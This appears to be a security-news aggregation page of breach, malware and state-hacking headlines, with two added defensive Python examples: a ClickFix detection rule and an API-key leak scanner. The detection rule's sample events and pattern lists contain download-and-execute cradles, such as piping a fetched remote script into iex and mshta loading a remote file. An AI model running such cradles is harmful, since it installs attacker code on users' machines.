Cybercrime isn't just a cover for Iran's government goons - it's a key part of their operations

Ransomware, malware-as-a-service, infostealers benefit MOIS, too

Iranian government-backed snoops are increasingly using cybercrime malware and ransomware infrastructure in their operations - not just hiding behind criminal masks as a cover for destructive cyber activity, according to security researchers.…

Crooks compromise WordPress sites to push infostealers via fake CAPTCHA prompts

Rapid7 says crims broke into more than 250 sites globally, including a US Senate candidate’s campaign page

Cyber baddies quietly compromised legitimate WordPress websites, including the campaign site of a US Senate candidate, turning them into launchpads for a global infostealer operation.…

Fake job applications pack malware that kills EDR before stealing data

Russian-speaking attackers lure HR staff into downloading ISO files that disable defenses

A Russian-speaking cyber criminal is targeting corporate HR teams with fake CVs that quietly install malware which can disable security tools before stealing data from infected machines.…

Ericsson blames vendor vishing slip-up for breach exposing thousands of records

Crooks used simple phone scam to compromise vendor account, spilling personal and financial data belonging to more than 15,000 people

A voice-phishing scam targeting one of Ericsson's service providers has exposed the personal data of more than 15,000 individuals after attackers sweet-talked an employee into handing over access.…

Polish cops bust alleged teen DDoS kit sellers – youngest just 12

Kids profited from tools used to attack popular websites, say officials

Polish police have referred seven suspected juvenile cybercriminals to family court over an alleged scheme to flog DDoS kits online.…

ShinyHunters claims more high-profile victims in latest Salesforce customers data heist

And they abused a Mandiant-developed open source tool in the attacks

ShinyHunters told The Register that it has stolen data from about 100 high-profile companies in its latest Salesforce customer data heist, including Salesforce itself.…

EV charger biz ELECQ zapped by ransomware crooks, customer contact data stolen

An attack on the company’s AWS platform may have exposed customers' names and home addresses

Exclusive  ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems.…

Russian cybercrims phish their way into officials' Signal and WhatsApp accounts

Dutch spies flag large-scale campaign to hijack secure messaging accounts

Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys.…

FBI is investigating breach that may have hit its wiretapping tools

PLUS: Europol takes down two crime gangs; LastPass users phished (again); Crooks increase crypto hauls; And more

Infosec In Brief  The FBI is investigating a breach of its systems which reportedly affected systems related to wiretapping and surveillance.…

Spyware disguised as emergency-alert app sent to Israeli smartphones

Steals SMS messages, location data, contacts … and delivers it to Hamas-linked crew

Hamas-linked attackers are dropping spyware disguised as an emergency-alert app on Israelis' smartphones via SMS messages, according to security researchers.…

Cisco warns of two more SD-WAN bugs under active attack

Switchzilla says flaws could allow file overwrites or privilege escalation

Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software.…

Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal

Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves

A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.…
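The Windows Terminal twist above changes where the pasted command surfaces in telemetry: the victim, not a lure document, starts the shell. As an added example, not from Microsoft's write-up or The Register's story, the Python below runs a simple ClickFix rule over constructed process-creation events. It flags a shell launched from an interactive parent (WindowsTerminal.exe for this variant, explorer.exe for the older Win+R Run-dialog lure; that parent mapping is an assumption) whose command text carries a download-and-execute cradle. The key="value" event format, the sample events and the indicator lists are all constructed for the example; real Sysmon or PowerShell 4104 records need their own field mapping.

```python
import re
from typing import Dict, List, Tuple

# Parents from which a human would paste or type a command. WindowsTerminal.exe
# covers the Terminal variant, explorer.exe the Run-dialog lure. Assumed list.
INTERACTIVE_PARENTS = {"windowsterminal.exe", "explorer.exe"}

# Shells and LOLBins a pasted one-liner typically ends up in. Assumed list.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-and-execute cradle indicators common in copy-paste lures. Assumed list.
CRADLE_PATTERNS = [
    re.compile(r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring)\b", re.I),
    re.compile(r"\b(mshta|certutil|bitsadmin|curl)\b", re.I),
    re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
]

# Constructed sample events in a simplified key="value" format (not real EDR output).
SAMPLE_EVENTS = [
    r'parent="C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21_x64\WindowsTerminal.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" text="iwr http://example.invalid/fix.ps1 | iex"',
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" text="mshta http://example.invalid/verify.hta"',
    r'parent="C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21_x64\WindowsTerminal.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" text="Get-ChildItem C:\temp | Measure-Object"',
    r'parent="C:\Windows\System32\services.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" text="powershell -NoProfile -enc SQBFAFgA"',
    r'parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\whoami.exe" text="whoami"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" line into a dict; values may contain backslashes but not quotes."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cradle_hits(text: str) -> List[str]:
    """Return the first indicator each cradle pattern finds in the command text."""
    hits = []
    for pattern in CRADLE_PATTERNS:
        match = pattern.search(text)
        if match:
            hits.append(match.group(0).strip().lower())
    return hits


def is_clickfix_candidate(event: Dict[str, str]) -> List[str]:
    """Return cradle hits if an interactive parent started a shell carrying a cradle, else []."""
    if basename(event.get("parent", "")) not in INTERACTIVE_PARENTS:
        return []
    if basename(event.get("image", "")) not in SHELL_IMAGES:
        return []
    return cradle_hits(event.get("text", ""))


def scan(lines: List[str]) -> List[Tuple[Dict[str, str], List[str]]]:
    """Run the rule over raw event lines; return (event, hits) for every match."""
    flagged = []
    for event in map(parse_event, lines):
        hits = is_clickfix_candidate(event)
        if hits:
            flagged.append((event, hits))
    return flagged


if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(f"{basename(event['parent'])} -> {basename(event['image'])}: {hits}")
```

The fourth sample event carries an encoded command but is started by services.exe, so this rule ignores it on purpose: a scheduled task or service is a different detection, and folding it in here would drown the copy-paste signal in automation noise. Tune INTERACTIVE_PARENTS to whatever your telemetry records as the parent of the shell inside Windows Terminal.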

Transport for London says 2024 breach affected 7M customers, not 5,000

Attackers accessed systems holding data tied to millions of Oyster and contactless users

Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk.…

Iran intelligence backdoored US bank, airport, software outfit networks

MOIS-linked MuddyWater crew has a new, custom implant

An Iranian cyber crew believed to be part of the Iranian Ministry of Intelligence and Security (MOIS) has been embedded in multiple US companies' networks - including a bank, software firm, and airport, among others - since the beginning of February, with more activity in the days following the US and Israeli military strikes, according to security researchers.…

'Hundreds' of Iranian hacking attempts have hit surveillance cameras since the missile strikes

Attack infrastructure attributed to 'several Iran-nexus threat actors'

Multiple Iranian hacking crews have been targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the war started on February 28, according to Check Point security researchers. …

Malware-laced OpenClaw installers get Bing AI search boost

Think before you download

OpenClaw, the AI agent that can manage just about anything, is risky all by itself, but now fake installers for it are wreaking havoc. Users who searched Bing’s AI results for “OpenClaw Windows” were directed to a malicious GitHub repository that delivered information stealers and GhostSocks onto their machines.…

LexisNexis confirms data breach at Legal & Professional arm, some customer records affected

Crooks claim 2 GB haul from AWS instance via React2Shell exploit

Data analytics giant LexisNexis has confirmed its Legal & Professional division suffered a data breach days after the Fulcrumsec cybercrime crew claimed responsibility for the hack.…

Kaspersky dismisses claims Coruna iPhone exploit kit is connected to NSA-linked operation

Follows suggestions iPhone-pwning toolset bears hallmarks of zero-days that targeted Russian diplomats

Russian cybersecurity outfit Kaspersky is waving away claims that an iPhone exploit kit recently uncovered by Google was developed by the same people who were behind a group of zero-days that allegedly compromised thousands of Russian diplomats in a 2023 campaign.…

Dev stunned by $82K Gemini bill after unknown API key thief goes to town

Probably not an isolated incident, as researchers have already found 2,863 live API keys exposed

A developer says their company is on the hook for more than $82,000 in unauthorized charges after a stolen Google Gemini API key racked up massive usage costs in just 48 hours.…
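The bill above is the predictable outcome of a key that was committed or pasted somewhere public. As an added example, not from the story, from Google or from the researchers who counted the exposed keys, the Python below is a minimal pre-commit style scanner: it looks for Google, AWS and GitHub token shapes in a constructed set of files and reports each hit with the token redacted. The regexes encode the well-known prefix formats of those tokens; the sample file contents, including the fake keys, are constructed for the example and follow only the format.

```python
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    path: str
    line: int
    kind: str
    redacted: str


# Prefix-based token shapes. Word boundaries keep the bare word "AIza" from matching.
TOKEN_PATTERNS = {
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}


def redact(secret: str) -> str:
    """Keep just enough of the token to identify which one leaked without reprinting it."""
    return secret[:4] + "..." + secret[-4:]


def scan_text(path: str, text: str) -> List[Finding]:
    """Scan one file's contents line by line and return every token match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in TOKEN_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(Finding(path, lineno, kind, redact(match.group(0))))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> contents, e.g. the staged files of a commit."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed repository snapshot; the keys are fake and follow only the format.
SAMPLE_FILES = {
    ".env": "GEMINI_API_KEY=AIzaSyD0123456789abcdefghijklmnopqrstuv\nDEBUG=true\n",
    "app/config.py": 'import os\nAPI_KEY = os.environ["GEMINI_API_KEY"]  # read at runtime, nothing to leak\n',
    "scripts/deploy.sh": (
        "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        'curl -H "Authorization: token ghp_0123456789abcdefghijklmnopqrstuvwxyz" https://api.github.com/user\n'
    ),
}


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(f"{finding.path}:{finding.line}: {finding.kind} {finding.redacted}")
```

A hit means the key is burned: rotate it, because deleting it from the working tree leaves it in git history and in whatever the attacker already scraped. Pair the scanner with per-key API restrictions and a billing alert so that a key that still slips out cannot run up a five-figure bill unnoticed for two days.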

Turns out most cybercriminals are old enough to know better

Law enforcement data shows profit-driven cybercrime is dominated by 35- to 44-year-olds, not script kiddies

Contrary to what some believe, cybercrime is not a kids' game. Middle-aged adults, not teenagers, now make up the biggest chunk of people getting busted.…

Cybercriminals swipe 15.8M medical records from French doctors ministry

Third-party software supplier breached leading to leak of notes

Around 15.8 million administrative files were stolen after attackers breached a software supplier to France's health ministry.…

Phish of the day: Microsoft OAuth scams abuse redirects for malware delivery

Crims hope for payday from malicious payloads rather than stealing access tokens

Microsoft has warned organizations about ongoing OAuth abuse scams that use phishing emails and URL redirects to infect victims' machines with malware and take over their devices.…

Iran's cyberwar has begun

'Expect elevated activity for the foreseeable future'

Iranian hackers have launched spying expeditions, digital probes, and distributed denial of service (DDoS) attacks in the wake of the US and Israel launching missile strikes over the weekend, and security researchers urge organizations to expect more cyber intrusions as the war continues.…

UK businesses told to brace cyber defenses amid Iran conflict risk

NCSC urges all to review posture as escalating tensions increase risk of indirect digital spillover

The UK's cybersecurity agency is warning British organizations to brace for potential digital blowback as the Middle East conflict spills further into the online world.…

Scammers try to SIM-swap Dubai citizens hours after Iranian missile strikes

Vulnerable citizens targeted by criminals purporting to represent fake police crisis department

Scammers targeted Dubai citizens mere hours after missiles struck the city, attempting to gain access to their bank accounts, police have warned.…

South Korea’s tax office apologizes for leaking seed phrase to seized crypto

Went from triumph at having busted tax dodgers to embarrassment at losing the proceeds

South Korea’s National Tax Service has apologized after it leaked passwords to a stash of stolen crypto, which parties unknown used to make off with the digi-cash.…

Double whammy: Steaelite RAT bundles data theft, ransomware in one evil tool

Credential and cryptocurrency theft, live surveillance, ransomware - an attacker's Swiss Army knife

A new remote access trojan (RAT) being sold on cybercrime networks enables double extortion attacks on Windows machines by bundling ransomware and data theft, along with credential and cryptocurrency stealers, live surveillance, and a whole host of other illicit capabilities, all controllable from a centralized dashboard.…

Suspected Nork digital intruders caught breaking into US healthcare, education orgs

Who is knocking at the Dohdoor?

Digital intruders with possible links to North Korea have been infecting US education and healthcare sectors with a never-before-seen backdoor since at least December, according to security researchers.…

Ransomware payments cratered in 2025, but attacks surged to record highs

Smaller crews piled in as old names splintered and rebranded

Ransomware payments cratered in 2025, but it seems like the cybercrooks launching the attacks didn't get the memo.…

French DIY etailer ManoMano admits customer data stolen

Crooks claim they helped themselves to over 37M accounts during January hit on subcontractor

Updated  French online marketplace ManoMano is warning customers their personal data was siphoned off after a cyberattack hit one of its customer support subcontractors – and criminals are already claiming the haul is far larger than the company's carefully worded notice suggests.…

Cops back Dutch telco Odido after second wave of ShinyHunters leaks

Company refuses to pay ransom as attackers threaten larger daily dumps

The Netherlands' national police is backing Odido's refusal to pay a ransom after ShinyHunters leaked a second round of records belonging to the telco.…

Scattered Lapsus$ Hunters auditioning female voices to sharpen social engineering

Telegram posts promise up to $1,000 per call as gang refines IT helpdesk ruse

Prolific cybercrime crew Scattered Lapsus$ Hunters (SLSH) is reportedly recruiting women in the hope of improving its social engineering success.…

Google catches Beijing spies using Sheets to spread espionage across 4 continents

UNC2814 historically targets governments and telcos

A China-linked crew found a unique formula for attacking telcos and government orgs across the Americas, Asia, and Africa in its latest round of intrusions. Google's threat intelligence, along with unnamed industry partners, disrupted the gang, which used the Chocolate Factory's own spreadsheet tools as part of its exploits.…

Ex-L3Harris exec jailed 7 years for selling exploits to Russia

Former Trenchant manager profited millions from cyber tools reserved for the US

The former general manager of L3Harris's cyber arm will spend the next seven years behind bars for selling trade secrets to Russia.…

Wynn Resorts takes attacker's word for it that stolen staff data was deleted

Security pros question assurances as company offers staff credit monitoring

Wynn Resorts has confirmed that employee data was stolen from its servers, and is taking the hackers' word that they've since deleted it.…

OpenAI says Chinese cops used ChatGPT to plan and track smear ops against opponents

Note to secret agents: ChatGPT is NOT a private diary

A ChatGPT user with links to Chinese law enforcement tried to use the AI chatbot to run smear campaigns targeting the Japanese prime minister and other critics of the Chinese Communist Party, according to OpenAI's latest report on malicious uses of its models.…

North Korea's Lazarus Group targets healthcare orgs with Medusa ransomware

New ransomware of choice, same critical targets

North Korea’s Lazarus Group appears to have added another tool to its kit. It has begun using Medusa ransomware in extortion attacks targeting at least one US healthcare organization and an unnamed victim in the Middle East, according to Symantec and Carbon Black threat hunters.…

Korean cops charge teens over bike hire breach that exposed data on 4.62M riders

Public prosecutor mulls sentencing following investigations into two separate attacks

Two South Korean teenagers were this week charged with breaching Seoul's public bike service, Ttareungyi.…

Suspected Anonymous members detained in Spain over post-flood DDoS blitz

Quartet accused of attacking public institutions, claiming the government was responsible for 2024 tragedy

Spanish police say four self-proclaimed members of Anonymous are in custody after allegedly carrying out several cyberattacks on public authorities in the wake of the 2024 DANA floods.…

AWS says more than 600 FortiGate firewalls hit in AI-augmented campaign

Off-the-shelf tools helped Russian-speaking cybercrime group run riot

Cybercriminals armed with off-the-shelf generative AI tools compromised more than 600 internet-exposed FortiGate firewalls across 55 countries in just over a month, according to a new incident report from AWS.…

Attacker gets into France's database listing all bank accounts, makes off with 1.2 million records

PLUS: Unpatched Ivanti boxes under attack; 0APT might not be a scam; AI gets better at helping cyber-scum; And more

Infosec In Brief  An unknown attacker accessed the French government’s database listing every bank account in the country and made off with 1.2 million records.…

PayPal app code error leaked personal info and a 'few' unauthorized transactions

About 100 customers affected

PayPal has notified about 100 customers that their personal information was exposed online during a code change gone awry, and in a few of these cases, people saw unauthorized transactions on their accounts.…

ShinyHunters demands $1.5M not to leak Vegas casino and resort chain data

What happens in Vegas…

Las Vegas hotel and casino giant Wynn Resorts appears to be the latest victim of data-grabbing and extortion gang ShinyHunters.…

Ukrainian gets five years for helping North Koreans secure US tech jobs

Polish arrest leads to extradition and federal prison sentence

Ukrainian national Oleksandr Didenko will spend the next five years behind bars in the US for his involvement in helping North Korean IT workers secure fraudulent employment.…

Crims create fake remote management vendor that actually sells a RAT

$300 a month buys you a backdoor that looks like legit software

Researchers at Proofpoint late last month uncovered what they describe as a "weird twist" on the growing trend of criminals abusing remote monitoring and management software (RMM) as their preferred attack tools.…

Crims hit a $20M jackpot via malware-stuffed ATMs

FBI warns these cyber-physical attacks are on the rise

Thieves stole more than $20 million from compromised ATMs last year using a malware-assisted technique that the FBI says is on the uptick across the United States.…

Adidas investigates third-party data breach after criminals claim they pwned the sportswear giant

'Potential data protection incident' at an 'independent licensing partner,' we're told

Adidas has confirmed it is investigating a third-party breach at one of its partner companies after digital thieves claimed they stole information and technical data from the German sportswear giant.…

ShinyHunters claims it drove off with 1.7M CarGurus records

Latest in a rash of grab-and-leak data incidents

Updated  CarGurus purportedly suffered a data breach with 1.7 million corporate records stolen, according to a notorious cybercrime crew that posted the online vehicle marketplace on its leak site on Wednesday.…

Fraudster hacked hotel system, paid 1 cent for luxury rooms, Spanish cops say

'First time we have detected a crime using this method,' cops say

Spanish police arrested a hacker who allegedly manipulated a hotel booking website, allowing him to pay one cent for luxury hotel stays. He also raided the mini-bars and didn't settle some of those tabs, police say.…

Deutsche Bahn back on track after DDoS yanks the brakes

National rail bookings and timetables disrupted for nearly 24 hours

If you wanted to book a train trip in Germany recently, you would have been out of luck. The country's national rail company says that its services were disrupted for hours because of a cyberattack.…

This Melbourne data centre runs on human brain cells

Neurons already taught to play 'Doom' using Cortical Labs tech.

ACS changes leadership

Dr Prins Ralston steps in as interim CEO.

Tai chi scams target elderly Australians

Scamwatch warns of financial malware.

Bunnings ruling no "green light" for facial recognition

Privacy Commissioner says retail still faces scrutiny.

How Mark learned to code in a Sydney prison

Inside the program getting inmates into tech jobs.

US developing system to refund illegal tariffs

Current technology not suited to mammoth task.

WFH to become legal right for Victorians from 1 September

Business groups furious.

Porn sites block Australians in protest over age checks

RedTube, YouPorn and more react to new regulations.

CISOs warned as Iran conflict spills into cyberspace

Cyber, AI now strategic battlegrounds.

Laws not keeping pace with workplace surveillance

"Intrusive" wearable neurotechnology and eye tracking slammed.
Why 2026 Is the Perfect Time To Pivot Into Cybersecurity

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 10, 2026 – Read the full story in EC-Council The late 1990s dot-com boom saw internet adoption explode, venture capital pour in, new roles appear overnight, and salaries and opportunity follow.

The post Why 2026 Is the Perfect Time To Pivot Into Cybersecurity appeared first on Cybercrime Magazine.

Is Cybersecurity the Dark Horse for Venture Investors During the Iran Conflict?

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 9, 2026 – Read the full story in Forbes If Defense Tech is the loud winner during the Iran conflict, Cybersecurity is the quiet one, and the opportunity is just as large,

AI Didn’t Invent Social Engineering, It Made It Worse

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 5, 2026 – Listen to the podcast In the latest episode of “CISO Confidential“, a series on the popular Cybercrime Magazine Podcast sponsored by Doppel, host Charlie Osborne asked Deneen DeFiore, VP and

Examining North Korea’s Cybercrime Economy

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 4, 2026 – Read the full story in Finextra It is estimated that one third to a half of North Korea’s budget comes from cyberfraud and extortion. Finextra reports that most of these

Hollywood’s Ethical Hacker On The Cybercrime Magazine Podcast

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 3, 2026 – Listen to the podcast Ralph Echemendia is a world-renowned cybersecurity expert, known internationally by his alter ego “The Ethical Hacker.” In 2015, WIRED called Echemendia “Hollywood’s go-to digital

Software Supply Chain Risk: The Growing Threat Landscape

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 2, 2026 – Read the full story from Ox Security Cybersecurity Ventures predicted that global damage costs resulting from software supply chain attacks would reach $60 billion USD by 2025, and $138

WebcamGate 2009: A High School’s Laptop Initiative Turned Into A National Spying Scandal

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 27, 2026 – Watch the YouTube Short Cybercrime Magazine’s latest YouTube Short video, produced by Taylor Fox, looks back at a riveting privacy and surveillance story that gripped students, parents, and educators

The Cascading Economic Ripple Effects Of Cybercrime

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 26, 2026 – Read the full story in BitGuardian The staggering prediction by Cybersecurity Ventures that global cybercrime damages would reach $10.5 trillion USD annually by 2025 has served as a wake-up call

CISO Confidential Launches On The Cybercrime Magazine Podcast

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 25, 2026 – Listen to the podcast “CISO Confidential” is a new series on the Cybercrime Magazine Podcast, brought to our listeners by Doppel, a cybersecurity company on a mission to protect

Long Island Medium Star Theresa Caputo Meets Cybercrime Magazine – Live!

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 23, 2026 In 2024, Long Island Medium star Theresa Caputo slammed online scammers and begged fans not to send money to them. The reality star warned fans about many social media users impersonating her

Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days
Microsoft on Tuesday released patches for a set of 84 new security vulnerabilities affecting various software components, including two that have been listed as publicly known. Of these, eight are rated Critical, and 76 are rated Important in severity. Forty-six of the patched vulnerabilities relate to privilege escalation, followed by 18 remote code execution, 10 information disclosure, four
UNC6426 Exploits nx npm Supply-Chain Attack to Gain AWS Admin Access in 72 Hours
A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package last year to completely breach a victim's cloud environment within a span of 72 hours. The attack started with the theft of a developer's GitHub token, which the threat actor then used to gain unauthorized access to the cloud and steal data. "The threat actor, UNC6426, then used this
Five Malicious Rust Crates and AI Bot Exploit CI/CD Pipelines to Steal Developer Secrets
Cybersecurity researchers have discovered five malicious Rust crates that masquerade as time-related utilities to transmit .env file data to the threat actors. The Rust packages, published to crates.io, are listed below - chrono_anchor dnp3times time_calibrator time_calibrators time-sync The crates, per Socket, impersonate timeapi.io and were published between late February and early March
FortiGate Devices Exploited to Breach Networks and Steal Service Account Credentials
Cybersecurity researchers are calling attention to a new campaign where threat actors are abusing FortiGate Next-Generation Firewall (NGFW) appliances as entry points to breach victim networks.  The activity involves the exploitation of recently disclosed security vulnerabilities or weak credentials to extract configuration files containing service account credentials and network topology
How to Stop AI Data Leaks: A Webinar Guide to Auditing Modern Agentic Workflows
Artificial Intelligence (AI) is no longer just a tool we talk to; it is a tool that does things for us. These are called AI Agents. They can send emails, move data, and even manage software on their own. But there is a problem. While these agents make work faster, they also open a new "back door" for hackers. The Problem: "The Invisible Employee" Think of an AI Agent like a new employee who has
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Cybersecurity researchers have discovered a new malware called KadNap that's primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of
New "LeakyLooker" Flaws in Google Looker Studio Could Enable Cross-Tenant SQL Queries
Cybersecurity researchers have disclosed nine cross-tenant vulnerabilities in Google Looker Studio that could have permitted attackers to run arbitrary SQL queries on victims' databases and exfiltrate sensitive data within organizations' Google Cloud environments. The shortcomings have been collectively named LeakyLooker by Tenable. There is no evidence that the vulnerabilities were exploited in
The Zero-Day Scramble is Avoidable: A Guide to Attack Surface Reduction
You can't control when the next critical vulnerability drops. You can control how much of your environment is exposed when it does. The problem is that most teams have more internet-facing exposure than they realise. Intruder's Head of Security digs into why this happens and how teams can manage it deliberately. Time-to-exploit is shrinking The larger and less controlled your attack surface is,
APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military
The Russian state-sponsored hacking group tracked as APT28 has been observed using a pair of implants dubbed BEARDSHELL and COVENANT to facilitate long‑term surveillance of Ukrainian military personnel. The two malware families have been put to use since April 2024, ESET said in a new report shared with The Hacker News. APT28, also tracked as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa,
Threat Actors Mass-Scan Salesforce Experience Cloud via Modified AuraInspector Tool
Salesforce has warned of an increase in threat actor activity that's aimed at exploiting misconfigurations in publicly accessible Experience Cloud sites by making use of a customized version of an open-source tool called AuraInspector. The activity, per the company, involves the exploitation of customers' overly permissive Experience Cloud guest user configurations to obtain access to sensitive
CISA Flags SolarWinds, Ivanti, and Workspace One Vulnerabilities as Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability list is as follows - CVE-2021-22054 (CVSS score: 7.5) - A server-side request forgery (SSRF) vulnerability in Omnissa Workspace One UEM (formerly VMware Workspace One UEM) that
Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials
Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named "@openclaw-ai/openclawai," was uploaded to the registry by a user named "openclaw-ai" on March 3, 2026. It has been downloaded 178 times to date. The library is still available for
UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and
⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware
Another week in cybersecurity. Another week of "you've got to be kidding me." Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning. That's kind of just how it goes now. The good news? There were some actual wins this week. Real ones. The kind where the good guys showed up, did the work, and made a dent. It doesn't always
Can the Security Platform Finally Deliver for the Mid-Market?
Mid-market organizations are constantly striving to achieve security levels on a par with their enterprise peers. With heightened awareness of supply chain attacks, your customers and business partners are defining the security level you must meet. What if you could be the enabler for your organization to remain competitive — and help win business — by easily demonstrating that you meet these
Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "akshayanuonline@gmail.com" (BuildMelon), are listed below - QuickLens - Search Screen with
Web Server Exploits and Mimikatz Used in Attacks Targeting Asian Critical Infrastructure
High-value organizations located in South, Southeast, and East Asia have been targeted by a Chinese threat actor as part of a years-long campaign. The activity, which has targeted aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors, has been attributed by Palo Alto Networks Unit 42 to a previously undocumented threat activity group dubbed
OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
OpenAI on Friday began rolling out Codex Security, an artificial intelligence (AI)-powered security agent that's designed to find, validate, and propose fixes for vulnerabilities. The feature is available in a research preview to ChatGPT Pro, Enterprise, Business, and Edu customers via the Codex web with free usage for the next month. "It builds deep context about your project to identify
Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model
Anthropic on Friday said it discovered 22 new security vulnerabilities in the Firefox web browser as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven have been classified as moderate, and one has been rated low in severity. The issues were addressed in Firefox 148, released late last month. The vulnerabilities were identified over a two-week period in
Transparent Tribe Uses AI to Mass-Produce Malware Implants in Campaign Targeting India
The Pakistan-aligned threat actor known as Transparent Tribe has become the latest hacking group to embrace artificial intelligence (AI)-powered coding tools to strike targets with various implants. The activity is designed to produce a "high-volume, mediocre mass of implants" that are developed using lesser-known programming languages like Nim, Zig, and Crystal and rely on trusted services like
Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT
Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RAT) payloads that correspond to XWorm, AsyncRAT, and Xeno RAT. The stealthy attack chain has been codenamed VOID#GEIST by Securonix Threat Research. At a high level, the obfuscated batch script is used to deploy a second
The MSP Guide to Using AI-Powered Risk Management to Scale Cybersecurity
Scaling cybersecurity services as an MSP or MSSP requires technical expertise and a business model that delivers measurable value at scale. Risk-based cybersecurity is the foundation of that model. When done right, it builds client trust, increases upsell opportunities, and drives recurring revenue. But to deliver this consistently and efficiently, you need the right technology and processes.
Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor
New research from Broadcom's Symantec and Carbon Black Threat Hunter Team has discovered evidence of an Iranian hacking group embedding itself in several U.S. companies' networks, including banks, airports, non-profit, and the Israeli arm of a software company. The activity has been attributed to a state-sponsored hacking group called MuddyWater (aka Seedworm). It's affiliated with the Iranian
China-Linked Hackers Use TernDoor, PeerTime, BruteEntry in South American Telecom Attacks
A China-linked advanced persistent threat (APT) actor has been targeting critical telecommunications infrastructure in South America since 2024, targeting Windows and Linux systems and edge devices with three different implants. The activity is being tracked by Cisco Talos under the moniker UAT-9244, describing it as closely associated with another cluster known as FamousSparrow. It's worth
Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer
